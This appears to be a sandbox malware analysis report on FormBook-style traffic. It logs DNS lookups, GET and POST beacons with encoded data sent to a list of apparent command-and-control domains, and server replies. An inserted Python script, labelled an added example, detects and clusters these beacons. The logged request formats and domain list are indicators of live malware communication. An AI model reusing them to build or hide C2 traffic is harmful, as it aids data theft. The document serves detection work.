            Source: global traffic | HTTP traffic detected: GET /q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.darkerberrycoffee.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.featurasandals.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.anoldshow.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.badcopsinyourtown.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.autonomyai.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /xf32/?FNPd=C1mnXsnvmQ2srgCAP1LYR8UCiu5rr29LvVkLxlUVxlF6UozvjyxPjaNreXZ1i0YG7AgmeP0abVbXfNSSITNtMXyNs4HZedQg/L+kUEn9BLsW+ROjsB5HlVbKq/g7YxphTM4QsIM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.brzuszkiewicz.pl | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.novosti-dubai.ru | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.ilodezu.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.kubanci.ru | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= HTTP/1.1 | Host: www.dvizhenie-pallet.ru | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.szandraromanovics.hu | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= HTTP/1.1 | Host: www.fruitique.co.uk | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.isrninjas.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.emgeecontracting.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global traffic | DNS traffic detected: DNS query: www.emgeecontracting.shop
            Source: global traffic | DNS traffic detected: DNS query: www.upshercode.store
            Source: global traffic | DNS traffic detected: DNS query: www.botcsllc.com
            Source: global traffic | DNS traffic detected: DNS query: www.darkerberrycoffee.com
            Source: global traffic | DNS traffic detected: DNS query: www.featurasandals.com
            Source: global traffic | DNS traffic detected: DNS query: www.anoldshow.top
            Source: global traffic | DNS traffic detected: DNS query: www.badcopsinyourtown.info
            Source: global traffic | DNS traffic detected: DNS query: www.autonomyai.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.brzuszkiewicz.pl
            Source: global traffic | DNS traffic detected: DNS query: www.novosti-dubai.ru
            Source: global traffic | DNS traffic detected: DNS query: www.ilodezu.com
            Source: global traffic | DNS traffic detected: DNS query: www.kubanci.ru
            Source: global traffic | DNS traffic detected: DNS query: www.dvizhenie-pallet.ru
            Source: global traffic | DNS traffic detected: DNS query: www.szandraromanovics.hu
            Source: global traffic | DNS traffic detected: DNS query: www.fruitique.co.uk
            Source: global traffic | DNS traffic detected: DNS query: www.isrninjas.com
            Source: unknown | HTTP traffic detected: POST /x98j/ HTTP/1.1 | Host: www.upshercode.store | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Content-Length: 209 | Cache-Control: max-age=0 | Connection: close | Content-Type: application/x-www-form-urlencoded | Origin: http://www.upshercode.store | Referer: http://www.upshercode.store/x98j/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42 | Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
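The GET requests listed earlier and this POST share one shape: a four-character path segment, a query carrying one long base64 blob plus one 15-character token (the token is identical on every host, only the blob and the domain change), the IE11/Trident user agent on a Windows 10 host, Connection: close on every request, and for the POST a single form-encoded field with Origin and Referer pointing back at the same host and path. The script below is an added example for this page, not code from Joe Sandbox or from the sample; it turns those traits into a detector over raw HTTP requests and then clusters the flagged hosts by the constant token. Three of the sample inputs are rebuilt from requests in the report (the parameter order is flipped on the second, as it is on www.dvizhenie-pallet.ru); the fourth is a constructed benign request for contrast. The 80-character floor for the blob and the scoring rule are this example's own choices.

```python
"""Flag FormBook-style HTTP beacons in raw requests (added example)."""
import re
from urllib.parse import urlsplit

FORMBOOK_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")            # /88o1/, /x98j/, ...
B64_RE = re.compile(r"^[A-Za-z0-9+/]{80,}={0,2}$")   # opaque blob; 80 is an assumed floor
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{15}$")          # M8mTZ0xHNd1dPVm


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def _query_params(query):
    # Split by hand: urllib's parse_qsl would turn '+' into a space and break the blob.
    params = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[key] = value
    return params


def score_request(req):
    """List the beacon traits a request shows and decide whether it is FormBook-like."""
    parts = urlsplit(req["target"])
    headers = req["headers"]
    host = headers.get("host", "")
    params = _query_params(parts.query)
    blobs = [v for v in params.values() if B64_RE.match(v)]
    tokens = [v for v in params.values() if TOKEN_RE.match(v)]
    hits = []
    if PATH_RE.match(parts.path):
        hits.append("path")
    if req["method"] == "GET" and len(params) == 2 and blobs and tokens:
        hits.append("query")
    if req["method"] == "POST":
        key, _, value = req["body"].partition("=")
        ctype = headers.get("content-type", "")
        if ctype.startswith("application/x-www-form-urlencoded") and key and B64_RE.match(value):
            hits.append("body")
        if (headers.get("origin") == f"http://{host}"
                and headers.get("referer") == f"http://{host}{parts.path}"):
            hits.append("self_referer")
    if headers.get("user-agent") == FORMBOOK_UA:
        hits.append("ua")
    if headers.get("connection", "").lower() == "close":
        hits.append("close")
    return {
        "method": req["method"], "host": host, "path": parts.path,
        "token": tokens[0] if tokens else None, "hits": hits,
        # Path shape plus a matching query or body decides; UA and close only corroborate.
        "formbook": "path" in hits and ("query" in hits or "body" in hits),
    }


def analyze(raw_requests):
    return [score_request(parse_request(raw)) for raw in raw_requests]


def cluster_by_token(results):
    """Group flagged hosts by the 15-character token: one token across many hosts
    is one configuration rotating through its domain list."""
    clusters = {}
    for r in results:
        if r["formbook"] and r["token"]:
            clusters.setdefault(r["token"], set()).add(r["host"])
    return {token: sorted(hosts) for token, hosts in clusters.items()}


# Sample input: blob, token, hosts and POST body copied from the report; the
# last request is constructed and benign.
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
          "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")
BLOB_1 = "6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M="
BLOB_2 = "4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM="
POST_BODY = "FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB"


def raw_http(method, target, host, extra=(), body="", ua=FORMBOOK_UA):
    """Assemble a raw request in the header layout the report shows."""
    headers = [f"Host: {host}", f"Accept: {ACCEPT}", "Accept-Language: en-US,en;q=0.9",
               *extra, "Connection: close", f"User-Agent: {ua}"]
    return f"{method} {target} HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body


SAMPLE_REQUESTS = [
    raw_http("GET", f"/88o1/?FNPd={BLOB_1}&zdK0d=M8mTZ0xHNd1dPVm", "www.emgeecontracting.shop"),
    raw_http("GET", f"/t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd={BLOB_2}", "www.dvizhenie-pallet.ru"),
    raw_http("POST", "/x98j/", "www.upshercode.store",
             extra=("Accept-Encoding: gzip, deflate, br", f"Content-Length: {len(POST_BODY)}",
                    "Cache-Control: max-age=0", "Content-Type: application/x-www-form-urlencoded",
                    "Origin: http://www.upshercode.store", "Referer: http://www.upshercode.store/x98j/"),
             body=POST_BODY),
    raw_http("GET", "/index.html?q=formbook", "www.example.com",
             ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"),
]

if __name__ == "__main__":
    results = analyze(SAMPLE_REQUESTS)
    for r in results:
        print(r["method"], r["host"], r["path"], r["formbook"], r["hits"])
    print(cluster_by_token(results))
```

The decisive signal is the path shape combined with the query or body shape; the user agent and Connection: close are left as corroboration only, because a single Trident request with a closed connection is common enough in benign traffic. Note that a hit says nothing about which host is the live C2: FormBook walks its whole domain list, and most of the hosts above answered with a generic 404.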
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 23 May 2024 13:18:50 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 23 May 2024 13:19:06 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42" | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 